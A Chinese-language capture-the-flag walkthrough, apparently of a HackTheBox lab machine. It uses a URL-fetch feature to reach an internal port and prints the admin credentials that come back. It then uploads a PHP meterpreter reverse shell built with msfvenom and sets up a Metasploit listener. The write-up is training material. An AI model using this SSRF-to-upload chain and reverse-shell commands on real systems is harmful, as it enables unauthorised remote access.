天天看點

利用域名解析協定+特殊檔案檢視+php反向shell來getshell

發現443端口上提示有個staging.love.htb域名,很好,那麼我們可以去修改

/etc/hosts的檔案,指定這個域名的解析ip為10.10.10.239,然後就可以去通路這個域名了,kali中的修改指令如下:vim /etc/hosts

成功通路,結果如下:

利用域名解析協定+特殊檔案檢視+php反向shell來getshell

home看起來沒有什麼特别值得關注的,直接到demo

利用域名解析協定+特殊檔案檢視+php反向shell來getshell

發現可以通過 “url位址” 去通路檔案,于是想起了那個被禁止的5000端口,于是嘗試一下,看看能不能通路,指令 “ localhost:5000 ” ,通路結果如下:

利用域名解析協定+特殊檔案檢視+php反向shell來getshell
利用域名解析協定+特殊檔案檢視+php反向shell來getshell

成功擷取賬号與密碼:

賬号:admin

密碼:@LoveIsInTheAir!!! (咳咳,翻譯:愛在空氣裡,是以說啊,愛不可靠啊)

80端口不是有個登入界面嗎?直接輸入賬号密碼,然後就可以登入進去了

進入背景的管理界面如下:

利用域名解析協定+特殊檔案檢視+php反向shell來getshell

然後找到這個:

利用域名解析協定+特殊檔案檢視+php反向shell來getshell

點選new:

利用域名解析協定+特殊檔案檢視+php反向shell來getshell

這裡有個photo的地方, 可以上傳php檔案,那麼我們就可以上傳一個php/reverse_tcp檔案用來反向連接配接我們的主機,我們可以使用msfvenom來建立一個php的反向shell檔案,指令如下:

msfvenom -p php/meterpreter/reverse_tcp lhost=10.10.15.156 lport=3333 -f raw -o a.php

然後使用kali另外的終端來監聽,指令如下:

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set lhost 10.10.15.156

set lport 3333

exploit